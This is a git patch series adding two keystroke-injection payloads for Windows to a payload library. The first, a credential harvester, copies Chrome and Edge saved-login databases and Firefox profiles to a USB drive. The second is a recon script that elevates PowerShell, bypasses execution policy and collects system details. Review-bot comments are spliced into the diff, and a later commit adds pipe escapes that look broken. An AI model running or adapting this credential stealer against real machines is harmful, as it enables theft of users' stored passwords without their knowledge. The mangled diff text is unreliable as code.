From ddd7d2af4b0cda805b75bfc5842f98dc76bd84c8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:34:46 -0400 Subject: [PATCH 1/5] Create CredentialHarvester.txt --- .../CredentialHarvester.txt | 58 +++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt diff --git a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt new file mode 100644 index 000000000..1c607f3ee --- /dev/null +++ b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt 
@@ -0,0 +1,58 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM Open PowerShell with elevated privileges +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 1000 +REM Check if the USB drive exists +STRING $usbDrive = Get-WmiObject Win32_Volume | ? 
{ $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING if ($usbDrive -ne $null) { +ENTER +DELAY 500 +STRING cd $usbDrive; +ENTER +DELAY 500 +STRING mkdir BrowserData; +ENTER +DELAY 500 +STRING cd BrowserData; +ENTER +DELAY 500 +REM Copy Chrome Login Data to USB +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +ENTER +DELAY 500 +REM Copy Firefox Login Data to USB +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +ENTER +DELAY 500 +REM Copy Edge Login Data to USB +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) +STRING echo off | clip +ENTER +DELAY 500 +REM Close PowerShell +STRING exit +ENTER +DELAY 500 From 5b5c57f16b83c928ebd54347376262b63b9dc89b Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:38:24 -0400 Subject: [PATCH 2/5] Create VulnerabilityScanner.txt --- .../VulnerabilityScanner.txt | 629 ++++++++++++++++++ 1 file changed, 629 insertions(+) create mode 100644 payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt diff --git a/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt b/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt new file mode 100644 index 000000000..f7893f664 --- /dev/null +++ b/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt 
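Review bot: The comment `REM Open PowerShell with elevated privileges` does not match the keystrokes that follow it: `GUI r`, `STRING powershell`, `ENTER` start an ordinary console from the Run dialog, with no elevation step. I would reword it to `REM Open PowerShell from the Run dialog (standard user context)`. The banner's "This script exfiltrates credentials" is also vaguer than the body. The body copies the Chrome and Edge `Login Data` files and the entire Firefox `Profiles` directory into a `BrowserData` folder on the volume labelled MYUSB, and the header should say so. Those file reads and the removable-media write are the activity that endpoint monitoring on the host will record and that an engagement report has to account for.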
@@ -0,0 +1,629 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +REM Open Start Menu +CONTROL ESCAPE +DELAY 2000 +STRING powershell +REM Navigate to the context menu to run PowerShell as an administrator +DELAY 500 +RIGHTARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 3000 +ALT Y +DELAY 5000 +REM Set PowerShell Execution Policy to Bypass +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 200 +ENTER +DELAY 200 +REM Create the PowerShell script in memory and execute it +DELAY 200 +STRING $usbName = "MYUSB" +DELAY 200 +ENTER +DELAY 200 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 200 +ENTER +DELAY 200 +STRING if ($usbDrive) { +DELAY 200 +ENTER +DELAY 200 +STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName +DELAY 200 +ENTER +DELAY 200 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 200 +ENTER +DELAY 200 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 200 +ENTER +DELAY 200 +STRING $resultsFilePath = Join-Path 
-Path $directoryPath -ChildPath "results.txt" +DELAY 200 +ENTER +DELAY 200 +STRING "" > $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING function check-passwordpolicy { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING net accounts +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking password policy: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function audit-services { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-service | select-object name, displayname, status, starttype +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error auditing services: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-networksettings { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-netipconfiguration +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking network settings: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-softwarevulnerabilities { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking software vulnerabilities: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-cve { +DELAY 200 +ENTER +DELAY 200 +STRING param ( +DELAY 200 +ENTER +DELAY 200 +STRING [string]$productname, +DELAY 200 +ENTER +DELAY 200 +STRING 
[string]$version +DELAY 200 +ENTER +DELAY 200 +STRING ) +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay = 2 +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($response.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking CVEs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING if ($_.Exception -match '403') { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." 
+DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds 60 +DELAY 200 +ENTER +DELAY 200 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function analyze-logs { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-eventlog -logname system -newest 100 +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error analyzing logs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-openports { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netstat -an +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking open ports: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-missingupdates { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Checking Windows Update logs..." 
+DELAY 200 +ENTER +DELAY 200 +STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 200 +ENTER +DELAY 200 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 200 +ENTER +DELAY 200 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 200 +ENTER +DELAY 200 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error getting Windows Update log: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-firewallstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netsh advfirewall show allprofiles +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking firewall status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-smbv1status { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-antivirusstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-mpcomputerstatus +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking antivirus status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING audit-services >> $resultsFilePath +DELAY 200 
+ENTER +DELAY 200 +STRING check-networksettings >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING analyze-logs >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-openports >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-missingupdates >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-firewallstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-smbv1status >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 200 +ENTER +DELAY 200 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 200 +ENTER +DELAY 200 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($process in $runningSoftware) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += $process.Name +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($task in $scheduledTasks) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 200 +ENTER +DELAY 200 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 200 +ENTER +DELAY 200 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 200 +ENTER +DELAY 
200 +STRING if ($version) { +DELAY 200 +ENTER +DELAY 200 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Results saved to USB drive." +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING invoke-command -scriptblock $script +DELAY 200 +ENTER +DELAY 20000 From 582bb6138a9f8f230d9fbffc41e95333edd30f65 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:38:47 -0400 Subject: [PATCH 3/5] Rename VulnerabilityScanner.txt to Payload.txt --- .../{VulnerabilityScanner.txt => Payload.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/recon/VulnerabilityScanner/{VulnerabilityScanner.txt => Payload.txt} (100%) diff --git a/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt b/payloads/library/recon/VulnerabilityScanner/Payload.txt similarity index 100% rename from payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt rename to payloads/library/recon/VulnerabilityScanner/Payload.txt From 81260982f1c44c7446de9b9b49e3cd2948b63685 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:39:23 -0400 Subject: [PATCH 4/5] Rename CredentialHarvester.txt to Payload.txt --- .../CredentialHarvester/{CredentialHarvester.txt => Payload.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/exfiltration/CredentialHarvester/{CredentialHarvester.txt => Payload.txt} (100%) 
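Review bot: The last typed command, `invoke-command -scriptblock $script`, references `$script`, which is never assigned anywhere in this file. Every function and call above it is typed and run directly in the session, so that line can only raise an error and should be dropped. For the same reason the comment `REM Create the PowerShell script in memory and execute it` is inaccurate; something like `REM Define the audit functions in the session and run each one` matches what happens. The banner line "to save credentials to" looks copied from the other payload, since this one writes `results.txt` and `WindowsUpdate.log`, so `to save results to` is the accurate wording. The header should also list what the payload changes or discloses beyond the USB write, so that an authorised run can be reconciled with host and proxy logs: the process-scope `set-executionpolicy bypass`, the `Remove-Item ... -Recurse -Force` on the temp `WindowsUpdateLog` folder, and the requests to `services.nvd.nist.gov`, which carry installed product names and versions.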
diff --git a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt b/payloads/library/exfiltration/CredentialHarvester/Payload.txt similarity index 100% rename from payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt rename to payloads/library/exfiltration/CredentialHarvester/Payload.txt From f843113663277cfa6fcd7fdda7fce145835c8675 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Fri, 31 May 2024 09:31:35 -0400 Subject: [PATCH 5/5] Update Payload.txt --- .../CredentialHarvester/Payload.txt | 29 +++++++++++-------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/payloads/library/exfiltration/CredentialHarvester/Payload.txt b/payloads/library/exfiltration/CredentialHarvester/Payload.txt index 1c607f3ee..2e2e3f031 100644 --- a/payloads/library/exfiltration/CredentialHarvester/Payload.txt +++ b/payloads/library/exfiltration/CredentialHarvester/Payload.txt 
@@ -15,41 +15,46 @@ DELAY 500 STRING powershell DELAY 500 ENTER -DELAY 1000 +DELAY 1500 REM Check if the USB drive exists -STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter; +ENTER +DELAY 500 STRING if ($usbDrive -ne $null) { ENTER DELAY 500 -STRING cd $usbDrive; +STRING cd $usbDrive ENTER DELAY 500 -STRING mkdir BrowserData; +STRING mkdir BrowserData ENTER DELAY 500 -STRING cd BrowserData; +STRING cd BrowserData ENTER DELAY 500 REM Copy Chrome Login Data to USB -STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; -STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" +ENTER +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" } ENTER DELAY 500 REM Copy Firefox Login Data to USB -STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; -STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\" +ENTER +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" } ENTER DELAY 500 REM Copy Edge Login Data to USB -STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; -STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data" +ENTER +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" } ENTER DELAY 500 STRING } ENTER DELAY 500 REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did 
something on target PC) -STRING echo off | clip +STRING echo off ^| clip ENTER DELAY 500 REM Close PowerShell